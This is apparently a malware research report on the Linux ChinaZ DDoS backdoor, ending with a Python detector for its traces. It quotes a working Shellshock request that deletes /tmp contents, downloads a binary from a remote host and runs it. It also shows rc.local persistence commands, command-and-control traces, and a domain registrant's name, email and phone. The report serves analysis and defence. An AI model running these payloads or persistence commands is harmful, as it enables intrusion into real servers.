#MalwareMustDie! Quick/draft report on China DDoS Backdoor Malware: Linux.ChinaZ.DDoS (UPDATE)

The official announce (with pics etc) is here:
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3682

Sample : 9521 (ELF)
MD5    : b7e3ca05806aa99cad9d3768ff90f1d9
SHA256 : 92fd1971f7ac512d096821a4bf8553bc13d1c478680999dd2e15400fe8973793
VT     : https://www.virustotal.com/en/file/92fd1971f7ac512d096821a4bf8553bc13d1c478680999dd2e15400fe8973793/analysis/
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.26, stripped

ELF reverser: @unixfreaxjp
PE reverser/found by: @benkow

// [UPDATE] infection vector: ShellShock (thanks to benkow)
// The bash function-definition trigger "() { :; };" is carried in both the Referer and User-Agent fields of the request; each echo appends one stage to /tmp/Run.sh, which is then made executable and run.

[13/Jan/2015:06:07:18 +0100] "GET / HTTP/1.1" 200 311 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh; chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

// [UPDATE] Shellshock infector (ck.exe) is a Windows based application with low detection:
VT: https://www.virustotal.com/en/file/ae677c48a6fdd79129bde3b5321bc4c3cd95c20e63302ad98afadeef64514d5f/analysis/

// PoC of Windows shellshock infector/scanner: the same one-liner lives in .rdata as a format string, with %s filled in at runtime (payload URL, drop-name suffix):

.rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China'
.rdata:0057D808                 ; DATA XREF: StartAddress+124o
.rdata:0057D808                 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm'
.rdata:0057D808                 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm'
.rdata:0057D808                 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru'
.rdata:0057D808                 db 'n.sh;/tmp/Run.sh"',0

// autostart installation (persistence via /etc/rc.local):
// the first sed deletes every line matching "exit" (so the stock trailing "exit 0" can no longer end the script early), the second inserts the marker as line 2.

0x0804B580 sub_804B580 proc near
0x0804B5CC mov dword ptr [esp], offset aEtcRc_local      ; "/etc/rc.local"
0x0804B5D3 call sub_804B550                              ; checks the file (fstat etc.)
0x0804B5D8 mov [esp], ebx
0x0804B685 mov dword ptr [esp+4], offset aSedIESDEtcRc_l ; "sed -i -e '/%s/d' /etc/rc.local"
                                                         ; decoded strings ==> sed -i -e '/exit/d' /etc/rc.local  <=== NEW
(...)
0x0804B6A5 mov dword ptr [esp+4], offset aSedIE2ISSEtcRc ; "sed -i -e '2 i%s/%s' /etc/rc.local"
                                                         ; decoded strings ==> sed -i -e '2 i//ChinaZ' /etc/rc.local  <=== NEW
(...)
0x0804B6BE mov dword ptr [esp], offset aEtcRc_local      ; "/etc/rc.local"

// Snapshots:
pic.twitter.com/dc0cUiJOx0  <=== NEW
https://twitter.com/unixfreaxjp/status/555037345397764096
https://twitter.com/unixfreaxjp/status/554993736493445120
https://twitter.com/unixfreaxjp/status/555018427434151936

// CNC Backdoor data:
// (1) hostname, (2) IP, (3) port, (4) initial traffic

SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL)
SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0, $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("202.238.95.24")}, [16])
SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("121.12.173.173")}, 16)
SYSCALL5D, write(3, "\0\0\0\0Linux3.2.0-4-686-pae\0\275w\267\0\1\0\0"..., 168) = 168

00000000 00 00 00 00 4c 69 6e 75 78 33 2e 32 2e 30 2d 34 ....Linu x2.6.2-4
00000010 2d 36 38 36 2d 70 61 65 00 1d 7a b7 00 01 00 00 -686.... ..z.....
00000020 48 31 d6 09 48 31 d6 09 00 00 00 00 64 1c 7a b7 H1..H1.. ....d.z.
00000030 00 00 00 00 a0 2e d6 09 90 71 e4 b6 da a4 d0 b6 ........ .q......
00000040 ff ff ff ff 31 20 2a 20 32 35 33 31 4d 48 7a 00 ....1 * 2531MHz.
00000050 40 1c 7a b7 40 8c 0a 08 58 30 d6 09 d0 32 d6 09 @.z.@... X0...2..
00000060 01 00 00 00 31 30 30 32 20 4d 42 00 80 80 e4 b6 ....1002 MB.....
00000070 98 23 d6 09 ff ff ff ff 38 98 d0 b6 da a4 d0 b6 .#...... 8.......
00000080 05 00 00 00 56 49 50 00 40 8c 0a 08 58 30 d6 09 ....VIP. @...X0..
00000090 00 33 d6 09 01 00 00 00 05 00 00 00 00 00 00 00 .3...... ........
000000A0 88 a1 d0 b6 6e 20 01 00                         ....n ..

// CNC information...

$ my_lookup aa.gm352.com
aa.gm352.com.   300  IN A  121.12.173.173
gm352.com.      3600 IN NS ns4.he.net.
gm352.com.      3600 IN NS ns3.he.net.
gm352.com.      3600 IN NS ns2.he.net.
gm352.com.      3600 IN NS ns1.he.net.
gm352.com.      3600 IN NS ns5.he.net.

$ mycnccheck 121.12.173.173:9521
Connection to 121.12.173.173 9521 port [tcp/*] succeeded!
IPv4 TCP MMD.KickUR.ASS:36555->121.12.173.173:9521 (ESTABLISHED)

// IP origins, Domains..

$ echo 121.12.173.173 | bash origin.sh
Loc: ASN: 58543 | 121.12.168.0/21 | CHINATELECOM-HUNAN-H | SHENZHENSHILUOHUQUHEPINGLUYIFENGGUANGCHANGCZUO32H

Domain Name: GM352.COM
Registrar: GODADDY.COM, LLC
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.HE.NET
Name Server: NS2.HE.NET
Name Server: NS3.HE.NET
Name Server: NS4.HE.NET
Name Server: NS5.HE.NET
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 26-sep-2014
Creation Date: 19-nov-2012
Expiration Date: 19-nov-2015
>>> Last update of whois database: Tue, 13 Jan 2015 15:46:34 GMT <<<
Registry Registrant ID:
Registrant Name: Yang Hui
Registrant Organization:
Registrant Street: Baoanqu,Longhua,Dalangcunwei
Registrant City: Shenzhen
Registrant State/Province: Guangdong
Registrant Postal Code: 518131
Registrant Country: Djibouti
Registrant Phone: +86.075528176958
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: taosfa@hotmail.com

----
#MalwareMustDie!! Huzzah!
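A defender-side check built from the two host artifacts in the report (the Shellshock request and the rc.local edits), added here as an example and not part of the original post or the malware: it flags web access-log lines carrying the "() { :; };" trigger, pulls out the download URL and drop path, and inspects an rc.local text for the line-2 marker and the removed exit line. The log line, client IP and rc.local content are constructed from what the report shows; "xxxx" is the report's own redacted host.

```python
import re

# Bash function-definition prefix that triggers Shellshock.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\};")
# Stager download, "wget <url> -O <drop path>", as in the quoted request.
WGET_RE = re.compile(r"wget\s+(\S+)\s+-O\s+(\S+)")

# Constructed sample log line modelled on the one quoted in the report
# (client IP is made up; "xxxx" is the report's own redacted host).
SAMPLE_LOG = (
    '10.0.0.5 - - [13/Jan/2015:06:07:18 +0100] "GET / HTTP/1.1" 200 311 '
    '"() { :; }; /bin/bash -c \\"rm -rf /tmp/*;echo wget http://xxxx:81/9521 '
    '-O /tmp/China.Z-gxak >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\"" "-"'
)
# Constructed rc.local as it would look after the two sed edits in the report.
SAMPLE_RC_LOCAL = "#!/bin/sh -e\n//ChinaZ\n/tmp/China.Z-gxak\n"


def shellshock_hits(lines):
    """Return one record per log line carrying the Shellshock trigger."""
    hits = []
    for n, line in enumerate(lines, 1):
        if not SHELLSHOCK_RE.search(line):
            continue
        m = WGET_RE.search(line)
        hits.append({
            "line": n,
            "payload_url": m.group(1) if m else None,
            "drop_path": m.group(2) if m else None,
        })
    return hits


def rc_local_findings(text):
    """Flag the traces the sample's sed commands leave in /etc/rc.local."""
    lines = text.splitlines()
    findings = []
    # "sed -i -e '2 i//ChinaZ'" places the marker at line 2.
    if len(lines) >= 2 and "ChinaZ" in lines[1]:
        findings.append("ChinaZ marker at line 2")
    # "sed -i -e '/exit/d'" strips the stock trailing "exit 0".
    if not any(l.strip().startswith("exit") for l in lines):
        findings.append("no exit line")
    return findings


if __name__ == "__main__":
    print(shellshock_hits([SAMPLE_LOG]))
    print(rc_local_findings(SAMPLE_RC_LOCAL))
```

A missing exit line on its own is only a weak signal; treat it as corroboration for the marker or for an unknown /tmp path in rc.local.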